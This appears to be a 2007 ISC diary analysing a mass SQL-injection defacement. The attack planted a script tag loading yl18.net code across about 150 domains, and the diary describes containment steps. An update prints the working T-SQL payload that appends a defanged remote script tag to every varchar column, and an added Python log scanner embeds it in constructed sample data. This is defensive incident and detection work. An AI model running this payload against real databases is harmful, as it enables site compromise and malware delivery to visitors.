yl18.net mass defacement
Zack wrote to us yesterday to report a mass defacement. After a brief look, we were able to confirm his finding: the following (obfuscated) script tag had been injected into over 40 000 pages across the internet, covering around 150 domains that we know of so far.
script src="hXXp://yl 18.net/0.js"
This script generates a page containing several hidden iframe components. These link to other pages that contain browser-specific exploit code, such as the common ADODB exploit. On vulnerable systems, this code downloads, without prompting, a small number of executable droppers and executes them.
Upon review, most of the binaries downloaded appeared to be password stealers for online games, but not all have been reviewed yet. Anti-virus coverage differed greatly between the binaries. Below is the VirusTotal output for one sample:
Engine             Version        Last update  Result
AhnLab-V3          2007.11.7.0    2007.11.06   -
AntiVir            7.6.0.30       2007.11.06   TR/PSW.OnlineGames.gul
Authentium         4.93.8         2007.11.05   -
Avast              4.7.1074.0     2007.11.05   -
AVG                7.5.0.503      2007.11.06   PSW.OnlineGames.QCP
BitDefender        7.2            2007.11.06   Trojan.PWS.Onlinegames.NMG
CAT-QuickHeal      9.00           2007.11.06   TrojanPSW.OnLineGames.gul
ClamAV             0.91.2         2007.11.06   -
DrWeb              4.44.0.09170   2007.11.06   Trojan.PWS.Gamania.5503
eSafe              7.0.15.0       2007.10.28   suspicious Trojan/Worm
eTrust-Vet         31.2.5270      2007.11.05   -
Ewido              4.0            2007.11.06   -
FileAdvisor        1              2007.11.06   -
Fortinet           3.11.0.0       2007.10.19   -
F-Prot             4.4.2.54       2007.11.06   -
F-Secure           6.70.13030.0   2007.11.06   Trojan-PSW.Win32.OnLineGames.gul
Ikarus             T3.1.1.12      2007.11.06   Trojan-PWS.Win32.OnLineGames.gul
Kaspersky          7.0.0.125      2007.11.06   Trojan-PSW.Win32.OnLineGames.gul
McAfee             5157           2007.11.06   -
Microsoft          1.3007         2007.11.06   -
NOD32v2            2641           2007.11.06   -
Norman             5.80.02        2007.11.06   W32/OnLineGames.SPZ
Panda              9.0.0.4        2007.11.06   Suspicious file
Prevx1             V2             2007.11.06   Heuristic: Suspicious File With Persistence
Rising             20.17.12.00    2007.11.06   -
Sophos             4.23.0         2007.11.06   Mal/Packer
Sunbelt            2.2.907.0      2007.11.06   VIPRE.Suspicious
Symantec           10             2007.11.06   Infostealer.Gampass
TheHacker          6.2.9.117      2007.11.06   -
VBA32              3.12.2.4       2007.11.06   -
VirusBuster        4.3.26:9       2007.11.06   Packed/FSG
Webwasher-Gateway  6.0.1          2007.11.06   Trojan.PSW.OnlineGames.gul
This type of widespread attack can incur a serious toll and requires follow-up. At the ISC, we not only try to assess how to have a piece of malicious code taken down, but also what the attacker's next steps will be. We generally take at least the following steps to contain the incident:
- Inform the ISP hosting the malicious code. In this case, this was CHINANET, who have a massive deployed base and are not always able to respond promptly;
- If we receive no response or suspect a language issue, we inform the local incident response team (CSIRT/CERT) and ask them for assistance;
- We gather samples of the malicious code and distribute them to anti-virus vendors so they can build coverage;
- If it’s an important issue, we report it here on the diary so organizations can implement controls to protect themselves against infection.
We also assess what the attacker spent most time working on. In this case, compromising a single server in China and hosting a malicious script is low effort and can easily be repeated. Attacking thousands of sites and adding a link to them is his actual investment.
As such, once the server is taken offline, the attacker will promptly move hosting for the yl18.net domain to another server. If the domain is likely fully malicious, we try to pre-empt this and inform the registrar that the domain is used for illegal activities and should be disabled.
This is a problem: most registrars do not really care what a domain is used for. Malicious domains are, however, generally paid for with fake credit cards, and if this can be identified, the registrar has a legal basis to disable the domain.
These efforts take lots of time, and at this point in time, the server hosting yl18.net is still online and serving malicious code. Various .com web sites have been defaced with the script tag, most likely through SQL injection or cross-site scripting, and are infecting their users.
If you have the ability to do so, we suggest blocking traffic to yl18.net at your gateway.
UPDATE: A reader wrote in with some information on how his site was compromised. He confirmed the SQL injection pathway. Fellow handler Bojan had a look at the SQL statement, which had been hex-encoded and CAST into a variable:
declare @m varchar(8000);
set @m='';
-- Walk the system catalog and build one UPDATE statement per varchar column
-- (systypes name 'varchar') of every user table (sysobjects xtype 'U'); each
-- statement appends the script tag to the existing column value.
select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script src="hxxp://yl 18.net/0.js"></script>'';'
  from dbo.sysobjects a, dbo.syscolumns b, dbo.systypes c
  where a.id=b.id and a.xtype='U' and b.xtype=c.xtype and c.name='varchar';
-- @m is capped at 8000 characters, so the last statement may be cut off:
-- reverse the string, drop everything up to the first ';', reverse back.
set @m=REVERSE(@m);
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
-- Run the concatenated UPDATE statements.
exec(@m);
This code appends the malicious script tag to every column of type varchar in every user table, which also explains why such a large number of pages per site have been affected.
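As an added example (not part of this diary, and not code from the ISC), the following script decodes hex-encoded CAST payloads found in web server request logs and flags the ones that carry the catalog-walking UPDATE injection shown above. The diary does not show the exact encoded request, so the "DECLARE @S ... CAST(0x... AS VARCHAR) ... EXEC(@S)" wrapper, the log lines and the client addresses are constructed assumptions; the decoded statement embedded in the sample is the one quoted above, with the script source still defanged.

```python
# Added example (not from the ISC diary): decode hex-encoded CAST payloads in
# web server request logs and flag the ones that carry the catalog-walking
# UPDATE injection described above.  The log lines, IP addresses and the
# "DECLARE @S ... CAST(0x... AS VARCHAR) ... EXEC(@S)" wrapper are constructed
# for illustration; the diary does not show the exact encoded request.
import re
import urllib.parse
from typing import List, Tuple

# Matches the hex blob in CAST(0x... AS VARCHAR(...)) or NVARCHAR(...).
HEX_CAST = re.compile(r"CAST\s*\(\s*0x([0-9a-fA-F]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)

# Fragments of the decoded statement that characterise the payload from the
# diary: it walks sysobjects/syscolumns, builds UPDATE statements that append
# a <script> tag, and runs them with exec().
SIGNATURES = ("sysobjects", "syscolumns", "update[", "<script", "exec(")


def decode_hex_casts(request: str) -> List[str]:
    """URL-decode one request string and return the text of every hex CAST
    blob in it.  NVARCHAR payloads are UTF-16LE (visible as embedded NUL
    bytes); everything else is treated as single-byte VARCHAR."""
    text = urllib.parse.unquote_plus(request)
    decoded = []
    for match in HEX_CAST.finditer(text):
        hexdigits = match.group(1)
        if len(hexdigits) % 2:          # malformed blob: cannot be bytes, skip
            continue
        raw = bytes.fromhex(hexdigits)
        if b"\x00" in raw:
            try:
                decoded.append(raw.decode("utf-16-le"))
                continue
            except UnicodeDecodeError:
                pass
        decoded.append(raw.decode("latin-1"))
    return decoded


def scan_log(lines) -> List[Tuple[int, List[str], str]]:
    """Return (line number, matched signatures, decoded SQL) for every log
    line whose decoded CAST payload looks like the injection."""
    hits = []
    for number, line in enumerate(lines, 1):
        for sql in decode_hex_casts(line):
            lowered = sql.lower()
            matched = [s for s in SIGNATURES if s in lowered]
            if matched:
                hits.append((number, matched, sql))
    return hits


# --- constructed sample data -------------------------------------------------
# The statement from the diary, with the script source still defanged.
INJECTED_SQL = (
    "declare @m varchar(8000);set @m='';"
    "select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'"
    "+b.name+'))+''<script src=\"hxxp://yl 18.net/0.js\"></script>'';' "
    "from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c "
    "where a.id=b.id and a.xtype='U' and b.xtype=c.xtype and c.name='varchar';"
    "exec(@m);"
)


def wrap_as_hex_cast(sql: str) -> str:
    """Constructed wrapper (assumed delivery form, not shown in the diary):
    hex-encode the statement, wrap it in a CAST, and URL-encode the result as
    it would appear in a logged query string."""
    blob = sql.encode("latin-1").hex()
    wrapped = f"DECLARE @S VARCHAR(8000);SET @S=CAST(0x{blob} AS VARCHAR(8000));EXEC(@S)"
    return urllib.parse.quote(wrapped)


# Constructed W3C-style log lines: date time client-ip method uri-stem uri-query status
SAMPLE_LOG = [
    "2007-11-06 03:12:44 198.51.100.20 GET /products.asp id=12 200",
    "2007-11-06 03:12:51 198.51.100.20 GET /products.asp id=12;" + wrap_as_hex_cast(INJECTED_SQL) + " 500",
    "2007-11-06 03:13:02 203.0.113.7 GET /news.asp id=7;CAST(0x41 AS VARCHAR) 200",
]

if __name__ == "__main__":
    for number, matched, sql in scan_log(SAMPLE_LOG):
        print(f"line {number}: matched {matched}")
        print("  decoded:", sql[:80], "...")
```

Only the second sample line is reported: the third line also carries a hex CAST, but it decodes to a single harmless character and matches none of the signatures, so decoding before matching is what separates the injection from ordinary noise. The same decoder can be pointed at a full IIS or Apache log with a one-line loop over the file.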
--
Maarten Van Horenbeeck
Comments
Jason, Nov 6th 2007
JJ, Nov 6th 2007: http://www.dshield.org/diary.html?storyid=2178
Eric, Nov 8th 2007